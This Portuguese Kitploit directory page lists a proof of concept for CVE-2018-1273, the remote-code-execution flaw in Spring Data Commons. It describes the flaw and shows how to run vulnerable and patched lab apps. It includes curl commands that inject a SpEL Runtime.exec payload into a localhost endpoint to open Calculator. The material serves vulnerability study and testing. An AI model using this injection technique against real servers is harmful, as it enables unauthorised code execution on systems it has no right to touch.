Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
poc-cve-2018-1273 — POC para CVE-2018-1273 | Kitploit
Ferramentas/GitHubGitHub/wearearima/poc-cve-2018-1273
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubwearearima/poc-cve-2018-1273

poc-cve-2018-1273

POC para CVE-2018-1273

Ver Repositório
24101há 8 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-1273

Spring Data Commons, versões anteriores a 1.13 até 1.13.10, 2.0 até 2.0.5, e versões mais antigas sem suporte, contêm uma vulnerabilidade no binder de propriedades causada pela neutralização inadequada de elementos especiais. Um usuário mal-intencionado remoto não autenticado (ou invasor) pode fornecer parâmetros de solicitação especialmente criados contra recursos HTTP com suporte do Spring Data REST ou usar a ligação de payload de solicitação baseada em projeção do Spring Data, o que pode levar a um ataque de execução remota de código.

Mais informações aqui

Execução

O aplicativo pode ser testado com a versão vulnerável ou com a versão corrigida do Spring Data Commons.

  • Versão vulnerável (padrão):
root@kitploit:~
mvn spring-boot:run
  • Versão corrigida:
root@kitploit:~
mvn spring-boot:run -Dfixed

Testando a vulnerabilidade

Execute o seguinte comando para verificar se a vulnerabilidade pode ser explorada:

  • No Windows:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"

  • No MacOs:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"

Baixar ferramenta

Créditos

Criado por https://www.arima.eu

ARIMA Software Design